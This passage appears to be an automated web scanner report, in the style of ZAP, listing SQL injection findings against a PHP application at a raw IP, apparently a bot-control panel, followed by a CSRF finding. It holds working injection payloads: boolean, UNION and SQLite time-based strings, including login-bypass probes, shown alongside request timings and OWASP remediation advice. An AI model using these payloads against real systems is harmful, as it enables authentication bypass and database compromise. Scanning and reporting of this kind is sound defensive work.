| Attack | " OR "1"="1 |
| Evidence | |
| Request Header - size: 993 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 261 bytes. | |
| Response Body - size: 560 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=56-2 |
| Method | GET |
| Parameter | id |
| Attack | 56-2 |
| Evidence | |
| Request Header - size: 706 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?query=query%25 |
| Method | GET |
| Parameter | query |
| Attack | query% |
| Evidence | |
| Request Header - size: 474 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?query=query+AND+1%3D1+--+ |
| Method | GET |
| Parameter | query |
| Attack | query AND 1=1 -- |
| Evidence | |
| Request Header - size: 485 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW%22+AND+%221%22%3D%221%22+--+ |
| Method | POST |
| Parameter | key |
| Attack | EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW" AND "1"="1" -- |
| Evidence | |
| Request Header - size: 632 bytes. | |
| Request Body - size: 33 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW%27+AND+%271%27%3D%271%27+--+ |
| Method | POST |
| Parameter | key |
| Attack | EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW' AND '1'='1' -- |
| Evidence | |
| Request Header - size: 1,090 bytes. | |
| Request Body - size: 208 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW+AND+1%3D1+--+ |
| Method | POST |
| Parameter | key |
| Attack | EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW AND 1=1 -- |
| Evidence | |
| Request Header - size: 1,075 bytes. | |
| Request Body - size: 129 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | POST |
| Parameter | customArgs |
| Attack | OR 1=1 -- |
| Evidence | |
| Request Header - size: 855 bytes. | |
| Request Body - size: 152 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | POST |
| Parameter | limit |
| Attack | ' UNION SELECT @@version -- -" OR "1"="1 |
| Evidence | |
| Request Header - size: 855 bytes. | |
| Request Body - size: 160 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | POST |
| Parameter | params |
| Attack | ' UNION SELECT @@version -- - AND 1=1 -- |
| Evidence | |
| Request Header - size: 855 bytes. | |
| Request Body - size: 152 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | POST |
| Parameter | sec-ch-ua |
| Attack | "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"% |
| Evidence | |
| Request Header - size: 856 bytes. | |
| Request Body - size: 138 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | POST |
| Parameter | Upgrade-Insecure-Requests |
| Attack | 1' AND '1'='1' -- |
| Evidence | |
| Request Header - size: 871 bytes. | |
| Request Body - size: 138 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=56-2 |
| Method | POST |
| Parameter | id |
| Attack | 56-2 |
| Evidence | |
| Request Header - size: 857 bytes. | |
| Request Body - size: 138 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?query=query+AND+1%3D1+--+ |
| Method | POST |
| Parameter | query |
| Attack | query AND 1=1 -- |
| Evidence | |
| Request Header - size: 505 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| Instances | 60 |
| Solution | Do not trust client side input, even if there is client side validation in place.<br>In general, type check all data on the server side.<br>If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'.<br>If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.<br>If database Stored Procedures can be used, use them.<br>Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!<br>Do not create dynamic SQL queries using simple string concatenation.<br>Escape all data received from the client.<br>Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.<br>Apply the principle of least privilege by using the least privileged database user possible.<br>In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.<br>Grant the minimum database access that is necessary for the application. |
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags | OWASP_2021_A03, WSTG-v42-INPV-05, OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 40018 |
| High | SQL Injection - Authentication Bypass |
|---|---|
| Description | SQL injection may be possible on a login page, potentially allowing the application's authentication mechanism to be bypassed. |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php |
| Method | GET |
| Parameter | sec-ch-ua-platform |
| Attack | "Windows" OR 1=1 -- |
| Evidence | |
| Request Header - size: 635 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 370 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | key |
| Attack | EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW AND 1=1 -- |
| Evidence | |
| Request Header - size: 1,061 bytes. | |
| Request Body - size: 129 bytes. | |
| Response Header - size: 253 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | key |
| Attack | EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW' AND '1'='1' -- |
| Evidence | |
| Request Header - size: 1,061 bytes. | |
| Request Body - size: 208 bytes. | |
| Response Header - size: 252 bytes. | |
| Response Body - size: 0 bytes. | |
| Instances | 3 |
| Solution | Do not trust client side input, even if there is client side validation in place.<br>In general, type check all data on the server side.<br>If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'.<br>If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.<br>If database Stored Procedures can be used, use them.<br>Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!<br>Do not create dynamic SQL queries using simple string concatenation.<br>Escape all data received from the client.<br>Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.<br>Apply the principle of least privilege by using the least privileged database user possible.<br>In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.<br>Grant the minimum database access that is necessary for the application. |
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags | OWASP_2021_A03, WSTG-v42-INPV-05, OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 40018 |
| High | SQL Injection - SQLite |
|---|---|
| Description | SQL injection may be possible. |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi |
| Method | GET |
| Parameter | query |
| Attack | query" | case randomblob(100000) when not null then "" else "" end -- |
| Evidence | The query time is controllable using parameter value [query" | case randomblob(100000) when not null then "" else "" end --], which caused the request to take [1,062] milliseconds, parameter value [query" | case randomblob(10000000) when not null then "" else "" end --], which caused the request to take [2,143] milliseconds, when the original unmodified query with value [query] took [455] milliseconds. |
| Request Header - size: 319 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%25'%20%20-- |
| Method | GET |
| Parameter | query |
| Attack | case randomblob(10000000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end ], which caused the request to take [2,172] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end ], which caused the request to take [4,246] milliseconds, when the original unmodified query with value [query] took [1,458] milliseconds. |
| Request Header - size: 494 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | key |
| Attack | case randomblob(100000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [1,097] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [2,074] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [867] milliseconds. |
| Request Header - size: 298 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | key |
| Attack | case randomblob(100000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [347] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [828] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [191] milliseconds. |
| Request Header - size: 252 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | key |
| Attack | case randomblob(100000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [363] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [608] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [92] milliseconds. |
| Request Header - size: 252 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | key |
| Attack | case randomblob(100000000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end ], which caused the request to take [776] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end ], which caused the request to take [848] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [233] milliseconds. |
| Request Header - size: 255 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects |
| Method | GET |
| Parameter | 327qi |
| Attack | " | case randomblob(100000) when not null then "" else "" end | " |
| Evidence | The query time is controllable using parameter value [" | case randomblob(100000) when not null then "" else "" end | "], which caused the request to take [776] milliseconds, parameter value [" | case randomblob(10000000) when not null then "" else "" end | "], which caused the request to take [2,260] milliseconds, when the original unmodified query with value [327qi] took [535] milliseconds. |
| Request Header - size: 531 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects |
| Method | GET |
| Parameter | query |
| Attack | case randomblob(100000000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end ], which caused the request to take [1,609] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end ], which caused the request to take [1,848] milliseconds, when the original unmodified query with value [query] took [2,021] milliseconds. |
| Request Header - size: 313 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav |
| Method | GET |
| Parameter | 327qi |
| Attack | 327qi * case randomblob(100000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [327qi * case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [1,798] milliseconds, parameter value [327qi * case randomblob(10000000) when not null then 1 else 1 end ], which caused the request to take [3,873] milliseconds, when the original unmodified query with value [327qi] took [1,017] milliseconds. |
| Request Header - size: 522 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav |
| Method | GET |
| Parameter | error.wav |
| Attack | " | case randomblob(100000) when not null then "" else "" end | " |
| Evidence | The query time is controllable using parameter value [" | case randomblob(100000) when not null then "" else "" end | "], which caused the request to take [1,912] milliseconds, parameter value [" | case randomblob(10000000) when not null then "" else "" end | "], which caused the request to take [2,091] milliseconds, when the original unmodified query with value [error.wav] took [1,200] milliseconds. |
| Request Header - size: 537 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav |
| Method | GET |
| Parameter | Sound Effects |
| Attack | " | case randomblob(1000000) when not null then "" else "" end | " |
| Evidence | The query time is controllable using parameter value [" | case randomblob(1000000) when not null then "" else "" end | "], which caused the request to take [1,739] milliseconds, parameter value [" | case randomblob(100000000) when not null then "" else "" end | "], which caused the request to take [3,633] milliseconds, when the original unmodified query with value [Sound Effects] took [1,807] milliseconds. |
| Request Header - size: 532 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | Accept |
| Attack | case randomblob(10000000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end ], which caused the request to take [1,045] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end ], which caused the request to take [2,271] milliseconds, when the original unmodified query with value [text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7] took [909] milliseconds. |
| Request Header - size: 671 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 255 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | host |
| Attack | " | case randomblob(100000) when not null then "" else "" end | " |
| Evidence | The query time is controllable using parameter value [" | case randomblob(100000) when not null then "" else "" end | "], which caused the request to take [182] milliseconds, parameter value [" | case randomblob(10000000) when not null then "" else "" end | "], which caused the request to take [254] milliseconds, when the original unmodified query with value [142.202.242.172] took [179] milliseconds. |
| Request Header - size: 799 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 206 bytes. | |
| Response Body - size: 325 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | key |
| Attack | ' | case randomblob(100000) when not null then "" else "" end | ' |
| Evidence | The query time is controllable using parameter value [' | case randomblob(100000) when not null then "" else "" end | '], which caused the request to take [761] milliseconds, parameter value [' | case randomblob(10000000) when not null then "" else "" end | '], which caused the request to take [2,198] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [228] milliseconds. |
| Request Header - size: 725 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | key |
| Attack | case randomblob(100000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [550] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [1,134] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [87] milliseconds. |
| Request Header - size: 240 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | key |
| Attack | case randomblob(100000000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end ], which caused the request to take [363] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end ], which caused the request to take [728] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [95] milliseconds. |
| Request Header - size: 243 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54 |
| Method | GET |
| Parameter | bot |
| Attack | case randomblob(100000000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end ], which caused the request to take [499] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end ], which caused the request to take [1,482] milliseconds, when the original unmodified query with value [DESKTOP-95IQEEV] took [2,031] milliseconds. |
| Request Header - size: 818 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54&task_select=1¶ms=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=&customArgs= |
| Method | GET |
| Parameter | limit |
| Attack | case randomblob(100000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [947] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [1,144] milliseconds, when the original unmodified query with value [' UNION SELECT @@version -- -] took [769] milliseconds. |
| Request Header - size: 997 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi |
| Method | POST |
| Parameter | 327qi |
| Attack | case randomblob(1000000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [1,236] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end ], which caused the request to take [1,418] milliseconds, when the original unmodified query with value [327qi] took [1,641] milliseconds. |
| Request Header - size: 319 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | key |
| Attack | case randomblob(100000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [366] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [581] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [146] milliseconds. |
| Request Header - size: 554 bytes. | |
| Request Body - size: 33 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | key |
| Attack | case randomblob(100000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [501] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [986] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [127] milliseconds. |
| Request Header - size: 554 bytes. | |
| Request Body - size: 33 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| Instances | 21 |
| Solution | Do not trust client side input, even if there is client side validation in place.<br>In general, type check all data on the server side.<br>If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'.<br>If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.<br>If database Stored Procedures can be used, use them.<br>Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!<br>Do not create dynamic SQL queries using simple string concatenation.<br>Escape all data received from the client.<br>Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.<br>Apply the principle of least privilege by using the least privileged database user possible.<br>In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.<br>Grant the minimum database access that is necessary for the application. |
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags | OWASP_2021_A03, WSTG-v42-INPV-05, OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 40024 |
| Medium | Absence of Anti-CSRF Tokens |
|---|---|
| Description | No Anti-CSRF tokens were found in an HTML submission form.<br>A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.<br>CSRF attacks are effective in a number of situations, including:<br>* The victim has an active session on the target site.<br>* The victim is authenticated via HTTP auth on the target site.<br>* The victim is on the same local network as the target site.<br>CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy. |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 301 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 289 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
